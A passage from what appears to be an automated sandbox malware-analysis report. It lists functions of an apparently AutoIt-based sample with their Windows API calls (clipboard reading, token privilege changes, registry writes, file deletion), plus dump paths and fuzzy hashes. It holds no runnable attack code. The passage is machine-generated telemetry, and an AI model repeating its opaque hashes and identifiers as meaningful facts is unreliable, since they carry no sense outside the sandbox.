                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CopyFile
                                          • String ID:
                                          • API String ID: 1304948518-0
                                          • Opcode ID: 11bd7973ed1baa9d4359064058c83c300a98f0b31c8ae0894d108584f19c084d
                                          • Instruction ID: 9bc065f009a7b43c421d9c65272114d1fc85b8e488c330e24fcfb55adb965727
                                          • Opcode Fuzzy Hash: 11bd7973ed1baa9d4359064058c83c300a98f0b31c8ae0894d108584f19c084d
                                          • Instruction Fuzzy Hash: D2D0A7315E020CBBEF50DFA0CC06F68B7ACE706706F1002A4BA04D90E0DAB269149795
                                          Function 000C42AE Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,001006E6,00000000,00000000,00000000), ref: 000C42BF
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: FilePointer
                                          • String ID:
                                          • API String ID: 973152223-0
                                          • Opcode ID: c9a0fab13531658ed67d4151fef1ae1394579d4141a9aafce8ebafdf8670235f
                                          • Instruction ID: 54cd5c6177dcf019e3898bffc0b109f3be8e443533b466c9e2fffed647fd9fa6
                                          • Opcode Fuzzy Hash: c9a0fab13531658ed67d4151fef1ae1394579d4141a9aafce8ebafdf8670235f
                                          • Instruction Fuzzy Hash: F0D0C77464020CBFE711DB81DC46FA9777CEB05710F100194FE0466690D6B27D508795
                                          Function 00114FEC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesW.KERNEL32(?,00113BFE), ref: 00114FED
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: 180fb3183c605544b0d090ead7f008ac7e20578de3da1806c776b742708dfdfd
                                          • Instruction ID: f4555942003cd8bc16b30d27a3300af4a6262c9706995de46c2eb56506ba5a59
                                          • Opcode Fuzzy Hash: 180fb3183c605544b0d090ead7f008ac7e20578de3da1806c776b742708dfdfd
                                          • Instruction Fuzzy Hash: EAB09239000602579D2C1E3C19680D933015957BA97D81B95E87885AF1933988CBA5A2
                                          Function 000D547B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: __wfsopen
                                          • String ID:
                                          • API String ID: 197181222-0
                                          • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                          • Instruction ID: 94cc4fca8392b6733cce254187034c274922123b96381c58c7b7211e22e40621
                                          • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                          • Instruction Fuzzy Hash: F3B09B7544020C77CE011941EC03A553B195740669F404011FF0C1C162A57395605995
                                          Function 0011D6BE Relevance: 1.4, APIs: 1, Instructions: 198COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32(00000002,00000000), ref: 0011D842
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ErrorLast
                                          • String ID:
                                          • API String ID: 1452528299-0
                                          • Opcode ID: 058e390d92fa0b6860635705874019dea823f679790b5c58beec51cacca32821
                                          • Instruction ID: 549695bf83e29f9845851993b91d5b10b9ffe7fc942ef72a7a430e3a6fe8e367
                                          • Opcode Fuzzy Hash: 058e390d92fa0b6860635705874019dea823f679790b5c58beec51cacca32821
                                          • Instruction Fuzzy Hash: 69713F742083028FC718EF64D491EEEB7E1AF89354F044A6DF596972A3DB30E945CB52
                                          Function 0011C270 Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00114005: FindFirstFileW.KERNEL32(?,?), ref: 0011407C
                                            • Part of subcall function 00114005: DeleteFileW.KERNEL32(?,?,?,?), ref: 001140CC
                                            • Part of subcall function 00114005: FindNextFileW.KERNELBASE(00000000,00000010), ref: 001140DD
                                            • Part of subcall function 00114005: FindClose.KERNEL32(00000000), ref: 001140F4
                                          • GetLastError.KERNEL32 ref: 0011C292
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                          • String ID:
                                          • API String ID: 2191629493-0
                                          • Opcode ID: cba9ac77960a332ff35ca0366c590478ed226b499886039b4fab49e53a8066f5
                                          • Instruction ID: 5eaa98c66f800687abeada9c1ba59c50fe8dbf3ab4e3f196937527a0c6ae6ff6
                                          • Opcode Fuzzy Hash: cba9ac77960a332ff35ca0366c590478ed226b499886039b4fab49e53a8066f5
                                          • Instruction Fuzzy Hash: 31F08C322102108FCB14EF59D840FEAB7E5AF88720F058419F94A8B353CB70BD41CB95
                                          Function 000C42CF Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                          Download Yara Rule
                                          APIs
                                          • CloseHandle.KERNEL32(?,?,00000000,000F2F8B), ref: 000C42EF
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID:
                                          • API String ID: 2962429428-0
                                          • Opcode ID: 4814543e39b0e47fad6f0b00f6becf902d6c5a6469a84f529c6e932c91ded876
                                          • Instruction ID: 4634971692521f5b965717577e88391fb7d4dc8955d9dc99369b8408292d5456
                                          • Opcode Fuzzy Hash: 4814543e39b0e47fad6f0b00f6becf902d6c5a6469a84f529c6e932c91ded876
                                          • Instruction Fuzzy Hash: D8E0B679800B01CFC3714F1AE81581AFBF4FFE53713614A2EE4E692660D3B0589ADB50

                                          Non-executed Functions

                                          Function 0013D164 Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000B29E2: GetWindowLongW.USER32(?,000000EB), ref: 000B29F3
                                          • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0013D208
                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0013D249
                                          • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0013D28E
                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0013D2B8
                                          • SendMessageW.USER32 ref: 0013D2E1
                                          • _wcsncpy.LIBCMT ref: 0013D359
                                          • GetKeyState.USER32(00000011), ref: 0013D37A
                                          • GetKeyState.USER32(00000009), ref: 0013D387
                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0013D39D
                                          • GetKeyState.USER32(00000010), ref: 0013D3A7
                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0013D3D0
                                          • SendMessageW.USER32 ref: 0013D3F7
                                          • SendMessageW.USER32(?,00001030,?,0013B9BA), ref: 0013D4FD
                                          • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0013D513
                                          • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0013D526
                                          • SetCapture.USER32(?), ref: 0013D52F
                                          • ClientToScreen.USER32(?,?), ref: 0013D594
                                          • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0013D5A1
                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0013D5BB
                                          • ReleaseCapture.USER32 ref: 0013D5C6
                                          • GetCursorPos.USER32(?), ref: 0013D600
                                          • ScreenToClient.USER32(?,?), ref: 0013D60D
                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0013D669
                                          • SendMessageW.USER32 ref: 0013D697
                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0013D6D4
                                          • SendMessageW.USER32 ref: 0013D703
                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0013D724
                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0013D733
                                          • GetCursorPos.USER32(?), ref: 0013D753
                                          • ScreenToClient.USER32(?,?), ref: 0013D760
                                          • GetParent.USER32(?), ref: 0013D780
                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0013D7E9
                                          • SendMessageW.USER32 ref: 0013D81A
                                          • ClientToScreen.USER32(?,?), ref: 0013D878
                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0013D8A8
                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0013D8D2
                                          • SendMessageW.USER32 ref: 0013D8F5
                                          • ClientToScreen.USER32(?,?), ref: 0013D947
                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0013D97B
                                            • Part of subcall function 000B29AB: GetWindowLongW.USER32(?,000000EB), ref: 000B29BC
                                          • GetWindowLongW.USER32(?,000000F0), ref: 0013DA17
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                          • String ID: @GUI_DRAGID$F
                                          • API String ID: 3977979337-4164748364
                                          • Opcode ID: 175a552329c0cffa49d789009d86302bfef84e3e78c82b92f0d2b36dcf215983
                                          • Instruction ID: d5d11d216b2d40333918113afa5984411fa81190da9dd3a296d2c3b37d5580fe
                                          • Opcode Fuzzy Hash: 175a552329c0cffa49d789009d86302bfef84e3e78c82b92f0d2b36dcf215983
                                          • Instruction Fuzzy Hash: C342BD74208341AFD725CF28E848FAABBF5FF49310F140659F699872A1C771D998CB92
                                          Function 00108F2E Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00109399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001093E3
                                            • Part of subcall function 00109399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00109410
                                            • Part of subcall function 00109399: GetLastError.KERNEL32 ref: 0010941D
                                          • _memset.LIBCMT ref: 00108F71
                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00108FC3
                                          • CloseHandle.KERNEL32(?), ref: 00108FD4
                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00108FEB
                                          • GetProcessWindowStation.USER32 ref: 00109004
                                          • SetProcessWindowStation.USER32(00000000), ref: 0010900E
                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00109028
                                            • Part of subcall function 00108DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00108F27), ref: 00108DFE
                                            • Part of subcall function 00108DE9: CloseHandle.KERNEL32(?,?,00108F27), ref: 00108E10
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                          • String ID: $default$winsta0
                                          • API String ID: 2063423040-1027155976
                                          • Opcode ID: 073e9558f50c4a598dd0147952261cbaaac35706f4a60c79287f5585643ee0f2
                                          • Instruction ID: ea80bab06a121ea575763562bf66a4d9e3cba399700bfae4a710f6aca623aeaf
                                          • Opcode Fuzzy Hash: 073e9558f50c4a598dd0147952261cbaaac35706f4a60c79287f5585643ee0f2
                                          • Instruction Fuzzy Hash: FE819D71900209FFDF119FA0CC59AEE7B79FF09314F084129F991A62A2D7B28E55DB60
                                          Function 00124632 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                          Download Yara Rule
                                          APIs
                                          • OpenClipboard.USER32(00140980), ref: 0012465C
                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 0012466A
                                          • GetClipboardData.USER32(0000000D), ref: 00124672
                                          • CloseClipboard.USER32 ref: 0012467E
                                          • GlobalLock.KERNEL32(00000000), ref: 0012469A
                                          • CloseClipboard.USER32 ref: 001246A4
                                          • GlobalUnlock.KERNEL32(00000000), ref: 001246B9
                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 001246C6
                                          • GetClipboardData.USER32(00000001), ref: 001246CE
                                          • GlobalLock.KERNEL32(00000000), ref: 001246DB
                                          • GlobalUnlock.KERNEL32(00000000), ref: 0012470F
                                          • CloseClipboard.USER32 ref: 0012481F
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                          • String ID:
                                          • API String ID: 3222323430-0
                                          • Opcode ID: ca53d983632d2354bb568cf3e5fb7acb3fa73989eb29f071c19edc15abff0735
                                          • Instruction ID: 19889064e40047d1541e1b920acf1766e23fc68b6aaba42ed16508e34e3a0b23
                                          • Opcode Fuzzy Hash: ca53d983632d2354bb568cf3e5fb7acb3fa73989eb29f071c19edc15abff0735
                                          • Instruction Fuzzy Hash: BE51C135204211ABD301EF61EC8AFAE77A8AF8AB10F01052DF656D31E2DF70D9558B62
                                          Function 0011CD9F Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?), ref: 0011CDD0
                                          • FindClose.KERNEL32(00000000), ref: 0011CE24
                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0011CE49
                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0011CE60
                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0011CE87
                                          • __swprintf.LIBCMT ref: 0011CED3
                                          • __swprintf.LIBCMT ref: 0011CF16
                                            • Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77
                                          • __swprintf.LIBCMT ref: 0011CF6A
                                            • Part of subcall function 000D38C8: __woutput_l.LIBCMT ref: 000D3921
                                          • __swprintf.LIBCMT ref: 0011CFB8
                                            • Part of subcall function 000D38C8: __flsbuf.LIBCMT ref: 000D3943
                                            • Part of subcall function 000D38C8: __flsbuf.LIBCMT ref: 000D395B
                                          • __swprintf.LIBCMT ref: 0011D007
                                          • __swprintf.LIBCMT ref: 0011D056
                                          • __swprintf.LIBCMT ref: 0011D0A5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                          • API String ID: 3953360268-2428617273
                                          • Opcode ID: dc9255ed1c8a94c2c306638cb55dae19f941e7254f33b6834c69aa0fb618701f
                                          • Instruction ID: a4e13219eaceb07975e09690453d70c0944845f69e3221117af9420219094bfe
                                          • Opcode Fuzzy Hash: dc9255ed1c8a94c2c306638cb55dae19f941e7254f33b6834c69aa0fb618701f
                                          • Instruction Fuzzy Hash: E2A13DB1408305ABC714EB64C986EEFB7ECEF95704F400929F59582193EB30DA45CB62
                                          Function 0011F5D8 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0011F5F9
                                          • _wcscmp.LIBCMT ref: 0011F60E
                                          • _wcscmp.LIBCMT ref: 0011F625
                                          • GetFileAttributesW.KERNEL32(?), ref: 0011F637
                                          • SetFileAttributesW.KERNEL32(?,?), ref: 0011F651
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0011F669
                                          • FindClose.KERNEL32(00000000), ref: 0011F674
                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 0011F690
                                          • _wcscmp.LIBCMT ref: 0011F6B7
                                          • _wcscmp.LIBCMT ref: 0011F6CE
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0011F6E0
                                          • SetCurrentDirectoryW.KERNEL32(0016B578), ref: 0011F6FE
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0011F708
                                          • FindClose.KERNEL32(00000000), ref: 0011F715
                                          • FindClose.KERNEL32(00000000), ref: 0011F727
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                          • String ID: *.*
                                          • API String ID: 1803514871-438819550
                                          • Opcode ID: 42964b281ead5da0b41153e3a4e5564029d6bd50af9ea6f43cecacd2d8d42d5a
                                          • Instruction ID: 66069fc6e95152a2a1b9e1f324f49544830a0e1f738e4933e610799ef2b7f706
                                          • Opcode Fuzzy Hash: 42964b281ead5da0b41153e3a4e5564029d6bd50af9ea6f43cecacd2d8d42d5a
                                          • Instruction Fuzzy Hash: 8131D575644219AADB25DFB5EC49EEE77ACAF09321F100179F904D31E0DB70DAC5CA60
                                          Function 00130EB7 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00130FB3
                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00140980,00000000,?,00000000,?,?), ref: 00131021
                                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00131069
                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 001310F2
                                          • RegCloseKey.ADVAPI32(?), ref: 00131412
                                          • RegCloseKey.ADVAPI32(00000000), ref: 0013141F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Close$ConnectCreateRegistryValue
                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                          • API String ID: 536824911-966354055
                                          • Opcode ID: 2a7e92d1f9249b5bc8589b1aed5daeeac33271cce6a05f03c1fc8cef13f43df0
                                          • Instruction ID: 1a79a11fad294a8e48bb57749d5cbd321b1a5ca971854c1b0a2063ab003cc3ff
                                          • Opcode Fuzzy Hash: 2a7e92d1f9249b5bc8589b1aed5daeeac33271cce6a05f03c1fc8cef13f43df0
                                          • Instruction Fuzzy Hash: 21026D75200601AFCB15EF25C891EAAB7E5FF89710F04895DF99A9B362CB30ED41CB91
                                          Function 0011F735 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0011F756
                                          • _wcscmp.LIBCMT ref: 0011F76B
                                          • _wcscmp.LIBCMT ref: 0011F782
                                            • Part of subcall function 00114875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00114890
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0011F7B1
                                          • FindClose.KERNEL32(00000000), ref: 0011F7BC
                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 0011F7D8
                                          • _wcscmp.LIBCMT ref: 0011F7FF
                                          • _wcscmp.LIBCMT ref: 0011F816
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0011F828
                                          • SetCurrentDirectoryW.KERNEL32(0016B578), ref: 0011F846
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0011F850
                                          • FindClose.KERNEL32(00000000), ref: 0011F85D
                                          • FindClose.KERNEL32(00000000), ref: 0011F86F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                          • String ID: *.*
                                          • API String ID: 1824444939-438819550
                                          • Opcode ID: 725f6d7cacdbd1f5179c32ecf9bc5720ab45f9785322fed5aebf2fc054f9e68c
